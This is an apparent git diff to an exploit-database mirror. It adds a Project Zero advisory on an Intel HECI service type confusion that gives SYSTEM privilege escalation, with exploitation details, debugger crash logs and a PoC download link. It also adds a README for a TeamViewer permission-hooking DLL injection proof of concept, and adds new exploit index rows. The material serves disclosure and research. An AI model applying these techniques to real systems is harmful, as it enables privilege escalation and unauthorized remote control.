+06 00000000`130fa4b0 000007fe`f23624b8 jscript!VAR::InvokeByDispID+0xffffffff`ffffffea
+07 00000000`130fa500 000007fe`f2368ec2 jscript!CScriptRuntime::Run+0x5a6
+08 00000000`130fb300 000007fe`f2368d2b jscript!ScrFncObj::CallWithFrameOnStack+0x162
+09 00000000`130fb510 000007fe`f2368b95 jscript!ScrFncObj::Call+0xb7
+0a 00000000`130fb5b0 000007fe`f236e6c0 jscript!CSession::Execute+0x19e
+0b 00000000`130fb680 000007fe`f23770e7 jscript!COleScript::ExecutePendingScripts+0x17a
+0c 00000000`130fb750 000007fe`f23768d6 jscript!COleScript::ParseScriptTextCore+0x267
+0d 00000000`130fb840 000007fe`e9a85251 jscript!COleScript::ParseScriptText+0x56
+0e 00000000`130fb8a0 000007fe`ea20b320 MSHTML!CActiveScriptHolder::ParseScriptText+0xc1
+0f 00000000`130fb920 000007fe`e9a86256 MSHTML!CScriptCollection::ParseScriptText+0x37f
+10 00000000`130fba00 000007fe`e9a85c8e MSHTML!CScriptData::CommitCode+0x3d9
+11 00000000`130fbbd0 000007fe`e9a85a11 MSHTML!CScriptData::Execute+0x283
+12 00000000`130fbc90 000007fe`ea2446fb MSHTML!CHtmScriptParseCtx::Execute+0x101
+13 00000000`130fbcd0 000007fe`e9b28a5b MSHTML!CHtmParseBase::Execute+0x235
+14 00000000`130fbd70 000007fe`e9a02e39 MSHTML!CHtmPost::Broadcast+0x90
+15 00000000`130fbdb0 000007fe`e9a5caef MSHTML!CHtmPost::Exec+0x4bb
+16 00000000`130fbfc0 000007fe`e9a5ca40 MSHTML!CHtmPost::Run+0x3f
+17 00000000`130fbff0 000007fe`e9a5da12 MSHTML!PostManExecute+0x70
+18 00000000`130fc070 000007fe`e9a60843 MSHTML!PostManResume+0xa1
+19 00000000`130fc0b0 000007fe`e9a46fc7 MSHTML!CHtmPost::OnDwnChanCallback+0x43
+1a 00000000`130fc100 000007fe`ea274f78 MSHTML!CDwnChan::OnMethodCall+0x41
+1b 00000000`130fc130 000007fe`e9969d75 MSHTML!GlobalWndOnMethodCall+0x240
+1c 00000000`130fc1d0 00000000`771f9bbd MSHTML!GlobalWndProc+0x150
+1d 00000000`130fc250 00000000`771f98c2 USER32!UserCallWinProcCheckWow+0x1ad
+1e 00000000`130fc310 000007fe`f2694a87 USER32!DispatchMessageWorker+0x3b5
+1f 00000000`130fc390 000007fe`f269babb IEFRAME!CTabWindow::_TabWindowThreadProc+0x555
+20 00000000`130ff610 000007fe`fe4c572f IEFRAME!LCIETab_ThreadProc+0x3a3
+21 00000000`130ff740 000007fe`f535925f iertutil!_IsoThreadProc_WrapperToReleaseScope+0x1f
+22 00000000`130ff770 00000000`772f59cd IEShims!NS_CreateThread::DesktopIE_ThreadProc+0x9f
+23 00000000`130ff7c0 00000000`7742a561 kernel32!BaseThreadInitThunk+0xd
+24 00000000`130ff7f0 00000000`00000000 ntdll!RtlUserThreadStart+0x1d
+
+=========================================
+-->
\ No newline at end of file
diff --git a/exploits/windows/dos/43373.txt b/exploits/windows/dos/43373.txt
new file mode 100644
index 000000000..fabe5ef6c
--- /dev/null
+++ b/exploits/windows/dos/43373.txt
@@ -0,0 +1,93 @@
+Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1358
+
+Intel Content Protection HECI Service Type Confusion EoP
+Platform: Tested on Windows 10, service version 9.0.2.117
+Class: Elevation of Privilege
+
+Summary:
+The Intel Content Protection HECI Service exposes a DCOM object to all users and most sandboxes (such as Edge LPAC and Chrome GPU). It has a type confusion vulnerability which can be used to elevate to SYSTEM privileges.
+
+Description:
+
+The Intel Content Protection HECI Service runs as LocalSystem and hosts a DCOM service. The main function is StartIo which takes an input variant and returns a variant. Based on what it’s trying to do I’d assume the input variant is supposed to be a byte array, however it contains a bug.
+
+The vulnerable code is roughly:
+
+HRESULT StartIo(VARIANT In, VARIANT* Out) {
+   CComSafeArray<char> array;
+   array::CopyFrom(In.parray);
+   // Work with array
+   ...
+}
+
+The issue here is that the In variant is used as a SAFEARRAY without checking that the VARIANT contains a SAFEARRAY. This leads to type confusion, for example a caller could pass VT_UI4 integer with any value they like and this code would interpret that integer as a pointer to a SAFEARRAY structure. This might seem to be only an arbitrary read issue, however the copy of the safe array can be made to execute arbitrary memory. If you point the type confused pointer at a block of memory which looks like a IUnknown array then when copying the array it will try and add a reference to each COM object in the array. This causes a VTable dispatch to AddRef which if carefully crafted should get arbitrary code execution.
+
+The call to CopyFrom does verify that the variant type is VT_UI1 (a byte array) however you can set some feature flags such as FADF_UNKNOWN which will force a call to IUnknown::AddRef on the elements of the array without changing the supposed variant type. Also you don’t need to guess the allocation address for the fake safearray as you can use a byte length BSTR which contains arbitrary data. The BSTR length field and the SAFEARRAY variant field lines up so as long as the lower 16 bits of the length is set to 17 (which is VT_UI1) it passes the checks and reads out the arbitrary contents from the allocated BSTR.
+
+The really bad thing about this service is not only is it intentionally designed to be accessible from even a heavily restrictive sandbox such as Edge LPAC but it runs with full LocalSystem privileges. While on Win10 CFG might make it harder to exploit, on Win7 you don’t have any such protection. Also the call is done inside an exception handler so even if the wrong address is chosen the service won’t crash (except for fast fail such as CFG).
+
+The following is an example crash when sending a fake safe array to the service (with just a dummy address of 0x18181818 as the IUnknown memory location).
+
+(1110.1188): Access violation - code c0000005 (first chance)
+First chance exceptions are reported before any exception handling.
+This exception may be expected and handled.
+eax=18181818 ebx=001e6290 ecx=18181818 edx=00209390 esi=11d41024 edi=18181818
+eip=18181818 esp=0126efc4 ebp=0126efec iopl=0         nv up ei pl nz na pe nc
+cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010206
+18181818 1818            sbb     byte ptr [eax],bl          ds:002b:18181818=18
+0:003> k
+ # ChildEBP RetAddr  
+WARNING: Frame IP not in any known module. Following frames may be wrong.
+00 0126efc0 74f740fb 0x18181818
+01 0126efec 74f73e42 OLEAUT32!SafeArrayCopyData+0x21b
+02 0126f018 010335d3 OLEAUT32!SafeArrayCopy+0x182
+03 0126f030 01034e1b IntelCpHeciSvc+0x135d3
+04 0126f118 750326e0 IntelCpHeciSvc+0x14e1b
+05 0126f144 74ff4fc2 RPCRT4!Invoke+0x34
+06 0126f598 7525555e RPCRT4!NdrStubCall2+0x452
+07 0126f5e4 74f70706 combase!CStdStubBuffer_Invoke+0xde [onecore\com\combase\ndr\ndrole\stub.cxx @ 1449] 
+08 0126f614 75300c48 OLEAUT32!CUnivStubWrapper::Invoke+0x136
+09 (Inline) -------- combase!InvokeStubWithExceptionPolicyAndTracing::__l6::<lambda_1ba7c1521bf8e7d0ebd8f0b3c0295667>::operator()+0x4e [onecore\com\combase\dcomrem\channelb.cxx @ 1824] 
+0a 0126f668 75303621 combase!ObjectMethodExceptionHandlingAction<<lambda_1ba7c1521bf8e7d0ebd8f0b3c0295667> >+0xa8 [onecore\com\combase\dcomrem\excepn.hxx @ 91] 
+0b (Inline) -------- combase!InvokeStubWithExceptionPolicyAndTracing+0x8e [onecore\com\combase\dcomrem\channelb.cxx @ 1822] 
+0c 0126f78c 75307330 combase!DefaultStubInvoke+0x221 [onecore\com\combase\dcomrem\channelb.cxx @ 1891] 
+0d (Inline) -------- combase!SyncStubCall::Invoke+0x22 [onecore\com\combase\dcomrem\channelb.cxx @ 1948] 
+0e (Inline) -------- combase!SyncServerCall::StubInvoke+0x22 [onecore\com\combase\dcomrem\servercall.hpp @ 779] 
+0f (Inline) -------- combase!StubInvoke+0x287 [onecore\com\combase\dcomrem\channelb.cxx @ 2173] 
+10 0126f90c 7530009b combase!ServerCall::ContextInvoke+0x440 [onecore\com\combase\dcomrem\ctxchnl.cxx @ 1541] 
+11 (Inline) -------- combase!CServerChannel::ContextInvoke+0x669 [onecore\com\combase\dcomrem\ctxchnl.cxx @ 1437] 
+12 (Inline) -------- combase!DefaultInvokeInApartment+0x669 [onecore\com\combase\dcomrem\callctrl.cxx @ 3532] 
+13 (Inline) -------- combase!ClassicSTAInvokeInApartment+0x669 [onecore\com\combase\dcomrem\callctrl.cxx @ 3296] 
+14 0126f9ac 75302b39 combase!AppInvoke+0x8bb [onecore\com\combase\dcomrem\channelb.cxx @ 1604] 
+15 0126fb3c 7530ff85 combase!ComInvokeWithLockAndIPID+0x599 [onecore\com\combase\dcomrem\channelb.cxx @ 2722] 
+16 0126fb98 7531056b combase!ComInvoke+0x1c5 [onecore\com\combase\dcomrem\channelb.cxx @ 2242] 
+17 (Inline) -------- combase!ThreadDispatch+0x83 [onecore\com\combase\dcomrem\chancont.cxx @ 421] 
+18 0126fbd8 76b12b5b combase!ThreadWndProc+0x21b [onecore\com\combase\dcomrem\chancont.cxx @ 741] 
+19 0126fc04 76b050f3 USER32!_InternalCallWinProc+0x2b
+1a 0126fcec 76b04a82 USER32!UserCallWinProcCheckWow+0x2d3
+1b 0126fd60 76b04850 USER32!DispatchMessageWorker+0x222
+1c 0126fd6c 010364e1 USER32!DispatchMessageW+0x10
+1d 0126fda0 01037039 IntelCpHeciSvc+0x164e1
+1e 0126fda8 0103e562 IntelCpHeciSvc+0x17039
+1f 0126fde0 0103e5ec IntelCpHeciSvc+0x1e562
+20 0126fdec 76928744 IntelCpHeciSvc+0x1e5ec
+21 0126fe00 770a582d KERNEL32!BaseThreadInitThunk+0x24
+22 0126fe48 770a57fd ntdll!__RtlUserThreadStart+0x2f
+23 0126fe58 00000000 ntdll!_RtlUserThreadStart+0x1b
+
+Proof of Concept:
+
+I’ve provided a PoC as a VS project which you can run which will cause the service to access invalid memory. Note that you’ll need a debugger attached to IntelCpHeciSvc.exe as the RPC/DCOM dispatch will swallow the exception, it doesn’t crash the service. The Poc builds a fake SAFEARRAY structure and passes it as a BSTR to the service which gets interpreted as a pointer to a SAFEARRAY. Ultimately it tries to copy the array and will call AddRef on elements of the array.
+
+1) Attach a debugger to IntelCpHeciSvc.exe
+2) Compile and run the provided poc.
+
+Expected Result:
+Sending the fake SAFEARRAY should fail.
+
+Observed Result:
+The service tries to execute invalid memory at 0x18181818 (or at least crashes on an invalid memory location).
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/43373.zip
\ No newline at end of file
diff --git a/exploits/windows/local/43366.md b/exploits/windows/local/43366.md
new file mode 100644
index 000000000..50ed85f48
--- /dev/null
+++ b/exploits/windows/local/43366.md
@@ -0,0 +1,34 @@
+# TeamViewer Permissions Hook V1
+---
+[![License](http://img.shields.io/badge/license-MIT-green.svg)](https://github.com/gellin/TeamViewer_Permissions_Hook_V1/blob/master/LICENSE)
+
+**A proof of concept injectable C++ DLL, that uses naked inline hooking and direct memory modification to change TeamViewer permissions.**
+
+## Features
+* **As the Server** - Enables extra menu item options on the right side pop-up menu. Most useful so far to enable the "switch sides" feature which is normally only active after you have already authenticated control with the client, and initiated a change of control/sides.
+* **As the Client** - Allows for control of mouse with disregard to servers current control settings and permissions.
+
+## Demo
+
+#### As the Server
+![](https://raw.githubusercontent.com/gellin/TeamViewer_Permissions_Hook_V1/84b3aecd8f65f138989d460740b52195f0b1e1ac/server_switch_sides.gif)
+
+#### Client
+![](https://raw.githubusercontent.com/gellin/TeamViewer_Permissions_Hook_V1/84b3aecd8f65f138989d460740b52195f0b1e1ac/client_takes_control.gif)
+
+## Rundown
+* Utilizes signature/pattern scanning to dynamically locate key parts in the code at which the assembly registers hold pointers to interesting classes. Applies inline naked hooks a.k.a code caves, to hi-jack the pointers to use for modification via direct memory access to their reversed classes.
+* Inject and follow the steps
+
+## Requirements
+* Your favorite Manual Mapper, PE Loader, DLL Injector, inject into - "TeamViewer.exe"
+* This version was Built on Windows 10, for TeamViewer x86 Version 13.0.5058 - (Other versions of TeamViewer have not been tested but with more robust signatures it may work, linux not supported)
+
+## Disclaimer
+* Developed for educational purposes as a proof of concept for testing. I do not condone the or support the use of this software for unethical or illicit purposes. No responsibility is held or accepted for misuse.
+
+## Credit
+[@timse93](https://github.com/timse93) - Research and Testing
+
+## EDB-Note
+Download ~ https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/43366.zip
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 7e79321a2..db7b379ef 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -5424,6 +5424,13 @@ id,file,description,date,author,type,platform,port
 43352,exploits/windows/dos/43352.py,"CDex 1.96 - Buffer Overflow",2017-12-18,bzyo,dos,windows,
 43354,exploits/linux/dos/43354.txt,"Zoom Linux Client 2.0.106600.0904 - Command Injection",2017-12-18,Conviso,dos,linux,
 43355,exploits/linux/dos/43355.txt,"Zoom Linux Client 2.0.106600.0904 - Stack-Based Buffer Overflow",2017-12-18,Conviso,dos,linux,
+43367,exploits/windows/dos/43367.html,"Microsoft Windows - 'jscript!NameTbl::GetValDef' Use-After-Free",2017-12-19,"Google Security Research",dos,windows,
+43368,exploits/windows/dos/43368.html,"Microsoft Internet Explorer 11 - 'jscript!JSONStringifyObject' Use-After-Free",2017-12-19,"Google Security Research",dos,windows,
+43369,exploits/windows/dos/43369.html,"Microsoft Windows - 'jscript!RegExpComp::Compile' Heap Overflow Through IE or Local Network via WPAD",2017-12-19,"Google Security Research",dos,windows,
+43370,exploits/windows/dos/43370.html,"Microsoft Windows - jscript.dll 'Array.sort' Heap Overflow",2017-12-19,"Google Security Research",dos,windows,
+43371,exploits/windows/dos/43371.html,"Microsoft Windows - 'jscript!JsArraySlice' Uninitialized Variable",2017-12-19,"Google Security Research",dos,windows,
+43372,exploits/windows/dos/43372.html,"Microsoft Windows - 'jscript!RegExpFncObj::LastParen' Out-of-Bounds Read",2017-12-19,"Google Security Research",dos,windows,
+43373,exploits/windows/dos/43373.txt,"Intel Content Protection HECI Service - Type Confusion Privilege Escalation",2017-12-19,"Google Security Research",dos,windows,
 41623,exploits/windows/dos/41623.html,"Microsoft Edge 38.14393.0.0 - JavaScript Engine Use-After-Free",2017-03-16,"Google Security Research",dos,windows,
 41629,exploits/windows/dos/41629.py,"FTPShell Client 6.53 - 'Session name' Local Buffer Overflow",2017-03-17,ScrR1pTK1dd13,dos,windows,
 41637,exploits/windows/dos/41637.py,"FTPShell Server 6.56 - 'ChangePassword' Buffer Overflow",2017-03-19,ScrR1pTK1dd13,dos,windows,
@@ -9223,6 +9230,7 @@ id,file,description,date,author,type,platform,port
 41607,exploits/windows/local/41607.cs,"Microsoft Windows - COM Session Moniker Privilege Escalation (MS17-012)",2017-03-15,"Google Security Research",local,windows,
 41619,exploits/windows/local/41619.txt,"Windows DVD Maker 6.1.7 - XML External Entity Injection",2017-03-16,hyp3rlinx,local,windows,
 43359,exploits/linux/local/43359.c,"Firejail < 0.9.44.4 / < 0.9.38.8 LTS - Local Sandbox Escape",2017-01-04,"Sebastian Krahmer",local,linux,
+43366,exploits/windows/local/43366.md,"TeamViewer 11 < 13 (Windows 10 x86) - Inline Hooking / Direct Memory Modification Permission Change (PoC)",2017-12-04,gellin,local,windows,
 41675,exploits/android/local/41675.rb,"Google Android 4.2 Browser and WebView - 'addJavascriptInterface' Code Execution (Metasploit)",2012-12-21,Metasploit,local,android,
 41683,exploits/multiple/local/41683.rb,"Mozilla Firefox < 17.0.1 - Flash Privileged Code Injection (Metasploit)",2013-01-08,Metasploit,local,multiple,
 41700,exploits/windows/local/41700.rb,"Sun Java Web Start Plugin - Command Line Argument Injection (Metasploit)",2010-04-09,Metasploit,local,windows,
@@ -15850,6 +15858,8 @@ id,file,description,date,author,type,platform,port
 43353,exploits/android/remote/43353.py,"Outlook for Android - Attachment Download Directory Traversal",2017-12-18,"Google Security Research",remote,android,
 43356,exploits/php/remote/43356.rb,"Western Digital MyCloud - 'multi_uploadify' File Upload (Metasploit)",2017-12-18,Metasploit,remote,php,
 43360,exploits/linux/remote/43360.py,"GoAhead httpd 2.5 < 3.6.5 - 'LD_PRELOAD' Remote Code Execution",2017-12-18,"Daniel Hodson",remote,linux,80
+43374,exploits/php/remote/43374.rb,"Tuleap 9.6 - Second-Order PHP Object Injection (Metasploit)",2017-12-19,Metasploit,remote,php,443
+43375,exploits/multiple/remote/43375.rb,"Jenkins - XStream Groovy classpath Deserialization (Metasploit)",2017-12-19,Metasploit,remote,multiple,8080
 41638,exploits/windows/remote/41638.txt,"HttpServer 1.0 - Directory Traversal",2017-03-19,malwrforensics,remote,windows,
 41666,exploits/windows/remote/41666.py,"Disk Sorter Enterprise 9.5.12 - 'GET' Remote Buffer Overflow (SEH)",2017-03-22,"Daniel Teixeira",remote,windows,
 41672,exploits/windows/remote/41672.rb,"SysGauge 1.5.18 - SMTP Validation Buffer Overflow (Metasploit)",2017-02-28,Metasploit,remote,windows,
@@ -37640,6 +37650,8 @@ id,file,description,date,author,type,platform,port
 43361,exploits/multiple/webapps/43361.md,"vBulletin 5 - 'routestring' Unauthenticated Remote Code Execution",2017-12-13,SecuriTeam,webapps,multiple,
 43362,exploits/multiple/webapps/43362.md,"vBulletin 5 - 'cacheTemplates' Unauthenticated Remote Arbitrary File Deletion",2017-12-13,SecuriTeam,webapps,multiple,
 43363,exploits/hardware/webapps/43363.py,"Linksys WVBR0 - 'User-Agent' Remote Command Injection",2017-12-14,nixawk,webapps,hardware,
+43364,exploits/hardware/webapps/43364.txt,"BrightSign Digital Signage - Multiple Vulnerablities",2017-12-19,"Information Paradox",webapps,hardware,
+43365,exploits/php/webapps/43365.txt,"Joomla! Component NextGen Editor 2.1.0 - 'plname' SQL Injection",2017-12-19,"Ihsan Sencan",webapps,php,
 41622,exploits/php/webapps/41622.py,"Wordpress Plugin Membership Simplified 1.58 - Arbitrary File Download",2017-03-16,"The Martian",webapps,php,
 41625,exploits/hardware/webapps/41625.txt,"AXIS Communications - Cross-Site Scripting / Content Injection",2017-03-17,Orwelllabs,webapps,hardware,
 41626,exploits/hardware/webapps/41626.txt,"AXIS (Multiple Products) - Cross-Site Request Forgery",2017-03-17,Orwelllabs,webapps,hardware,